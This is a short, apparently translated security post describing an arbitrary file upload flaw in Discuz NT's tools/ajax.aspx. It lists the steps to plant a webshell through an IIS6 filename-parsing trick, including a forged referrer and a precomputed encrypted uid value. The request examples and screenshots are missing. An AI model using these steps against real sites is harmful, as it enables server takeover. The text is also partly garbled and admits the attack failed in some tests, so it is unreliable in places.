Multiple versions of Discuz NT File Upload Vulnerability

Affected Versions:It seems that all of them are affected.

Vulnerability file: tools/ajax. aspx

 

Vulnerability Analysis: ajax requests on this page do not have permission verification, so visitors can call all of the methods in the page with the permission, which is very dangerous. Therefore, the following vulnerability occurs.

 

 

When the filename and upload parameters are not empty at the same time, obtain the input value, decrypt and generate the uid, then call UploadTempAvatar (uid) to upload the Avatar, and continue to follow up the UploadTempAvatar method:

 

 

Then, the uploaded file IIS6 will be executed directly to obtain the webshell.

Example:

1. Target Site: http://www.xxxxer.net

2. Forged reference, because the ajax page only verifies the reference.

3. construct the value of the input parameter, because our goal is to assign a value to the uid "test. asp; ", uid is decrypted by input, which is located in/config/general. config), for "test ;. asp "encrypted to obtain the input value" 20176iiayany7w0695pyvdoa = ".

4. Construct request parameters:

 

 

After the upload is successful, the shell address will be displayed directly,

 

 

Webshell is obtained successfully:

 

However, in the actual test, some of them failed, and they were too reluctant to find the reason. If you are interested, continue to study ^. ^. Cut off the official website and read the following:

 

Supplementary description of Jannock:

 

In fact, this is not universal. The Passwordkey will be regenerated during normal installation. It is estimated that you have used the source code for installation. However, there are other ways to use system generation.

Author: rebeyond from: I .S. T. O Information Security Team